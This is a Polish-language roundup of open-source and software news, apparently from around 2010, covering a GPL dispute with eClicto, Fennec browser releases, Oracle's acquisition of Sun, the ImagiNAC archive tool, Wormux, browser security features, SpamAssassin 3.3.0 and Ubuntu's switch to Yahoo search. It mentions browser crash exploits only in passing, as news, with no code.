Serwis eksiazki.org przeprowadził rozmowę z Maciejem Topolskim z eClicto, w której czytamy:

Pan Maciej przekonywał, iż według ekspertyz ich prawnika firma nie jest zobowiązana udostępnić jakikolwiek kod, jeśli tylko uważa, że może to naruszyć bezpieczeństwo ich systemu. Stwierdził również, że są gotowi pokazywać kod tym, którzy zwrócą się do nich z prośbą – aczkolwiek będzie to odpłatne, bo wiązało się będzie to z poświęceniem przez któregoś z pracowników swojego czasu (kod bowiem można będzie zobaczyć na laptopie Kolportera tylko w siedzibie ich firmy, nie ma możliwości uzyskania kopii kodu). Ponieważ osobiście ciągle nie jestem przekonany, iż tak faktycznie stanowią przepisy GPLu, z niecierpliwością czekam na ekspertyzę prawną, którą pan Maciej obiecał mi wysłać, bym mógł się z nią zapoznać.

Z tego co wiemy, udostępnienie oprogramowania licencjonowanego na GPL klientom jest bezwarunkowe i nie może być uzależnione od czynników takich jak “bezpieczeństwo systemu”. Wygląda to na idealny case do zgłoszenia serwisowi gpl-violations.org, który zajmuje się naruszeniami tej licencji.

Po trzech wersjach release candidate, Mozilla funduje nam oficjalną, stabilną wersję Fenneca – 1.0, jak na razie tylko dla systemu operacyjnego firmy Nokia – Maemo.

Fennec 1.0 w wersji dla Nokii N900, bazujący na silniku Firefoksa 3.6, jest dostępny do pobrania na specjalnej stronie Firefoksa dla urządzeń mobilnych. Ostatnia wersja release candidate, czyli trzecia, dostępna jest dla Linuksa, Mac OSX oraz Windowsa.

Po nowym Fennecu spodziewać się możemy między innymi:

• sprawdzania pisowni
• obsługi ponad 35 języków
• Awesome Bar znany z biurkowych wersji przeglądarki – funkcja przeszukiwania zarówno historii, jak i zakładek oraz tagów
• interfejs użytkownika zorientowany na urządzenia sterowane dotykiem
• dodawanie zakładek jednym dotknięciem
• Weave Sync, o którym pisano już na OSnews.pl
• Mechanizm Add-ons
• Menadżer haseł
• Menadżer pobierania
• i inne.

Fennec, specjalna wersja przeglądarki Firefox przeznaczona do zastosowań w urządzeniach mobilnych, głównie inteligentnych telefonach, trafi w wersji beta na Androida już w lutym tego roku.

Firefox jest najpopularniejszą przeglądarką w Polsce, znany jest także na całym globie. Mozilla dostrzegła potencjał drzemiący w nowej platformie mobilnej – Androidzie, gdyż coraz więcej osób decyduje się na zakup telefonu z systemem operacyjnym od Google, dlatego zdecydowała się na opracowanie Fenneca w wersji na Androida. 

Prace nad tą przeglądarką w wersji dla Androida rozpoczęły się już kilka miesięcy temu, o czym pisałem. Beta tej wersji ma się pojawić w lutym, czyli mniej-więcej rok po wydaniu pierwszej bety Fenneca w ogóle.

Firma Oracle stała się producentem systemów komputerowych: Sun jest już a wholly owned subsidiary of Oracle Corporation. Na konferencji prasowej p. Larry Ellison i jego pracownicy przedstawili nowy kurs Oracle, miejsce produktów Sun w ofercie giganta z Redwood City i miejsce Sun w nowej strukturze.

Oracle zamierza być jak “IBM z lat 1960, ale otwarte″ i być zdolne do dostarczania kompletnych rozwiązań informatycznych. Co więcej: Oracle dysponując pełną gamą technologii od CPU do aplikacji zamierza projektować te elementy wspólnie aby jak najlepiej ze sobą współpracowały. W dalszym ciągu jednak Oracle pozostanie przy otwartych standardach i platformach (cokolwiek oznaczałoby to) pozwalając n.p. uruchamiać swoje oprogramowanie na sprzęcie konkurencji, tj. HP i IBM. Zgodnie ze wcześniejszymi zapowiedziami Oracle zamierza kontynuować rozwój praktycznie wszystkich obecnych produktów Sun Microsystems.

Przyszłość sprzętu Sun

P. Ellison wyraził wiarę, że klienci, którzy zwątpili w Sun w ostatnich miesiącach dostrzegą, że Oracle te rozwiązania rozwija, i ponownie zaczną w te technologie inwestować.  Oracle wyraziło zainteresowanie kontynuowaniem rozwoju zarówno sprzętu high end (SPARC) jak i x86 i potwierdził ustami swojego wiceprezesa ds. mikroelektroniki Mike’a Splaina, że systemy z UltraSPARC T3 będą dostępne jeszcze w tym roku, a trzy następne generacje już są opracowywane.

Przyszłość oprogramowania Sun

Środowisko operacyjne Solaris 10 zostało nazwane “najlepszym systemem UNIX na świecie” i jego rozwój będzie dla Oracle strategiczny, jednak nie zamierza porzucać systemu operacyjnego Oracle Enterprise Linux (”systemu zgodnego z Red Hat ale lepszego od Red Hat” – Larry Ellison).

Oprogramowanie Glassfish będzie referencyjną implementacją serwera aplikacyjnego Java EE i rekomendowanym produktem dla “taktycznych aplikacji”, podczas gdy WebLogic będzie platformą dla “strategicznych aplikacji przedsiębiorstw”. Oracle zamierza też zwiększyć nakłady na rozwój Javy (języka, w którym pisana jest większość aplikacji Oracle), w tym podnieść wydajność aplikacji desktopowych i polepszyć przenośność aplikacji mobilnych.

Przyszłość Sun

Struktury Sun będą w pełni zintegrowane z Oracle, jednak Oracle przejmie zespoły inżynierów Sun i wbrew zapowiedziom analityków nie planuje kontynuować polityki masowych zwolnień (od zaraz zatrudni 2000 inżynierów i sprzedawców, wiele więcej niż zamierza zwolnić).

• OSnews – KE wyraziła zgodę
• notatka prasowa – transakcja sfinalizowana, Oracle kupiło Sun
• sun.com – strona Sun Microsystems prowadzi do Oracle.com

Narodowe Archiwum Cyfrowe udostępniło wersję beta open source’owego programu do masowej obróbki plików graficznych.

Archiwach państwowe oraz instytucje prowadzące masową digitalizację swoich zbiorów archiwalnych potrzebują programu, który umożliwia masową obróbkę plików graficznych wytworzonych w trakcie skanowania, aby móc je udostępnić użytkownikom, przede wszystkim w Internecie. „Należy pamiętać, że pliki, które możemy oglądać na stronach internetowych, różnią się od tych, które powstają w procesie digitalizacji. Ich rozdzielczość, wielkość jest zwykle zmieniana, podobnie jak format zapisu. Są one zwykle graficznie oznakowane np. znakiem wodnym. Taką obróbkę należy wykonywać, aby usprawnić proces udostępniania zeskanowanych archiwaliów w masowych ilościach” – tłumaczy proces Łukasz Skowron, kierownik Pracowni Digitalizacji NAC. Narodowe Archiwum Cyfrowe,pełniąc funkcję Centrum Kompetencji w zakresie digitalizacji, zbudowało i udostępniło program ImagiNAC, który jest odpowiedzią na potrzeby instytucji masowo digitalizujących swoje zbiory.

Zbudowany w ramach prac projektowych nad Systemem Digitalizacji Archiwalnej (SeDAn) program ImagiNAC został skonstruowany w oparciu o komponenty dostępne zgodnie z licencjami open source. W związku z tym Narodowe Archiwum Cyfrowe udostępnia ImagiNAC wersja beta (1.01) na zasadzie licencji GNU GPLv3, co oznacza m.in. że programu można używać całkowicie bezpłatnie. „Narodowe Archiwum Cyfrowe jest pierwszą instytucją administracji publicznej w Polsce, która stworzyła i udostępniła program zgodnie z zasadami wolnego oprogramowania.” – podkreśla Rafał Magryś, kierownik Oddziału Archiwistyki Zasobów Cyfrowych.

Stosowanie rozwiązań open source i otwartych standardów przez administrację publiczną jest już normą w krajach Unii Europejskiej. Chętnie korzystają z nich również środowiska archiwistów na całym świecie. Sztandarowym przykładem takich działań jest rozwijany przez Międzynarodową Radę Archiwalną system ICA-ATOM. Zaletą stosowania rozwiązań open source są znaczne oszczędności środków publicznych (nie trzeba ponosić opłat związanych z zakupem licencji, a także jej przedłużaniem), co w sytuacji kryzysu gospodarczego ma szczególne znacznie. Równie ważne są pełna kontrola nad tworzonymi narzędziami informatycznymi oraz możliwość dowolnej, bezpłatnej modyfikacji oprogramowania zgodnie z bieżącymi potrzebami.

Zapraszamy do pobierania ImagiNAC 1.01 http://www.nac.gov.pl/ImagiNAC1.01

Pojawiła się nowa wersja otwartej gry Wormux, która swoim klimatem nawiązuje nieco do popularnej gry Worms, wydanej przez Team17. Nowe wydanie, które pierwotnie miało nosić numerek 0.8.6, przynosi kilka ważnych nowości oraz poprawki błędów.

Nowy Wormux przynosi między innymi:

• ulepszoną sztuczną inteligencję;
• poprawione działanie gier sieciowych;
• dwie nowe drużyny: Postfix oraz Hexley;
• trzy nowe mapy zastępujące trzy usunięte;
• kilka innych ulepszeń i poprawek błędów.

Warto przy okazji wspomnieć, że jakiś czas temu pojawił się także port tej gry (wersja 0.8.4) dla platformy Maemo.

Pobierz nową wersję.

W ciągu ostatnich kilku dni ukazały się nowe wersje dwóch przeglądarek internetowych. Popularny Firefoks doczekał się wersji oznaczonej numerem 3.6, natomiast wciąż zwiększający swój udział w rynku Google Chrome dostępny jest już w wersji 4.0. Oprócz kilku zmian technologicznych oraz rozszerzeń funkcjonalności, nowe wersje znanych przeglądarek zostały również wyposażone w nowe mechanizmy bezpieczeństwa. Czy więc możemy się czuć bezpieczniej?

Ognisty Lisek w wersji 3.6 przyniósł nam obsługę Personas, niewielką zmianę wyglądu, lepszą obsługę HTML5 oraz usprawnienia dotyczące wydajności. Firefox doczekał się również zmian w zakresie bezpieczeństwa. Zmiany te dotyczą przede wszystkim wewnętrznej obsługi systemu dodatków. Debiutujący mechanizm Component Directory Lockdown wprowadza bowiem większy nadzór nad dodatkami i nie pozwala na ich potajemną instalację. Zaś z punktu widzenia użytkownika, na szczególną uwagę zasługuje funkcja wykrywania przestarzałych (czyli potencjalnie niebezpiecznych) wtyczek (takich jak Java, Shockwave Flash, Silverlight, itd.). Jako, że luki odkrywane w tego typu oprogramowaniu są coraz częściej wykorzystywane do przeprowadzania niebezpiecznych ataków, funkcja ta z pewnością podnosi bezpieczeństwo naszego systemu. Szkoda tylko, że mechanizm nie został w pełni zintegrowany z samą przeglądarką. W celu skorzystania z funkcji Plugin Check zmuszeni jesteśmy bowiem do odwiedzenia specjalnej strony internetowej.

Nowy Google Chrome to przede wszystkim długo oczekiwany system rozszerzeń, możliwość synchronizacji zakładek online oraz lepsza obsługa HTML5. Wersja 4.0 wprowadza również kilka nowości w zakresie bezpieczeństwa. Obsługa mechanizmu Strict Transport Security pozwala na wymuszanie bezpiecznych połączeń, natomiast eksperymentalna funkcja XSS Auditor ma nam zapewniać ochronę przed atakami typu cross-site-scripting.

Wygląda więc na to, że twórcy przeglądarek coraz większą uwagę przywiązują do nowatorskich zabezpieczeń. Nowe wersje przeglądarek są więc bezpieczniejsze, czy jednak możemy sobie pozwolić na uśpienie naszej czujności? Zdecydowanie nie.

Nie dalej bowiem jak wczoraj opublikowany został exploit Proof of Concept powodujący awaryjne zakończenie pracy przeglądarki Firefox w najnowszej wersji 3.6. Exploit ten wykorzystuje błędy w mechanizmach przetwarzania dokumentów XML i jest dostępny dla każdego pod następującym adresem (po jego pobraniu i rozpakowaniu wystarczy uruchomić plik poc.html). Odkrywca błędu zapowiedział również opublikowanie w najbliższym czasie informacji na temat kolejnej luki w przeglądarce Internet Explorer 8. Natomiast użytkownicy starszych wersji przeglądarki z firmy Microsoft mają już dziś kolejne powody do zmartwień, bowiem właśnie pojawił się exploit powodujący awaryjne zakończenie pracy oprogramowania IE 6 oraz 7.

Widać więc wyraźnie, że pomimo usilnych starań twórców, obecna generacja przeglądarek internetowych nadal nie zapewni nam w stu procentach bezpiecznej i stabilnej pracy…

Materiał pochodzi z serwisu HARD CORE SECURITY LAB.

Apache Software Foundation ogłosiła wydanie nowej wersji popularnej aplikacji służącej do skanowania zawartości poczty elektronicznej i oceny prawdopodobieństwa czy dana wiadomość jest spamem, a znanej szerzej jako SpamAssassin. Program ten jest dostępny na licencji Apache 2.0. Nowe wydanie przynosi przede wszystkim ważną zmianę w sposobie aktualizacji zasad używanych do wykrywania niechcianych wiadomości.

Nowe wydanie przynosi oddzielenie zestawu zasad wykrywania spamu od głównej części aplikacji. Od teraz będą one aktualizowane automatycznie za pomocą narzędzia sa-update. Taka możliwość pojawiła się już w wersji 3.2.0, ale była opcjonalna.

Wersja 3.3.0 przynosi także między innymi:

• lepsza obsługa IPv6;
• znacznie ulepszona wtyczka DKIM;
• dodane wsparcie dla reputacji DCC;
• ulepszona obsługa błędów.

Pobierz nową wersję.
Informacje o wydaniu.
Informacje dotyczące aktualizacji z poprzednich wersji.

Począwszy od kolejnej wersji systemu Ubuntu (10.04 LTS – Lucid Lynx) domyślnie ustawioną wyszukiwarką w przeglądarce będzie nie Google lecz Yahoo! Canonical, komercyjny sponsor rozwoju Ubuntu, podpisał umowę podziału przychodów pochodzących z wyników wyszukiwarki Yahoo!, która to umowa zapewni dochód firmie Canonical. Ten przychód powinien pomóc w dalszym finansowaniu opłacanych pracowników oraz dalszym rozwoju infrastruktury związanej z tą popularną dystrybucją Linuksa.

W związku z tą decyzją szykują się następujące zmiany:

• Domyślnym dostawcą wyszukiwarki na nowych instalacjach Ubuntu Lucid będzie Yahoo!
• Domyślnym dostawcą wyszukiwarki na aktualizacjach poprzednich wersji Ubuntu do Ubuntu Lucid będzie Yahoo! Tzn. jeżeli używana była domyślna wyszukiwarka w Ubuntu, którą teraz jest Google, zostanie ona zmieniona na Yahoo!
• Użytkownicy, którzy zaktualizują system do wydania Lucid Lynx, a mieli ustawioną wyszukiwarkę inną niż Google, będą mieć zachowane ustawienia. Mogą jednak zmienić wyszukiwarkę na Yahoo! co zapewni dochód firmie Canonical.
• Oczywiście nadal można swobodnie zmienić dostawcę wyszukiwarki, Yahoo! będzie tylko domyślnie ustawioną wyszukiwarką. Zmiana taka jednak jest jednoznaczna z tym iż przychód z wyszukiwania nie trafi do Canonical i nie wspomoże rozwoju tej dystrybucji.
• Dodatkowo zmieni się strona startowa przeglądarki, jej wygląd będzie zależny od ustawionego dostawcy wyszukiwania. Dla użytkowników wyszukiwarki Yahoo! strona startowa związana będzie z Yahoo!, dla użytkowników wyszukiwarki Google strona startowa związana będzie z Google.

Zmiany te są związane z dążeniem do stanu, w którym Ubuntu będzie przynosiło zysk, tzn. nie będzie zmuszone korzystać z prywatnego kapitału Marka Shuttlewortha dla dalszego rozwoju.

Cytując za autorem wpis na blogu poruszającym temat tej zmiany, Alanem Pope:

No doubt this will cause some consternation within the Ubuntu community, as many find changes to “their” browser to be tantamount to breaking and entering their home. Indeed when these things were previously messed with there were a few heated complaints and reports of broken-ness.

Hopefully the dialog on this change will remain civil and, well.. lucid.

Więcej opinii na ten temat można przeczytać na Planet Ubuntu.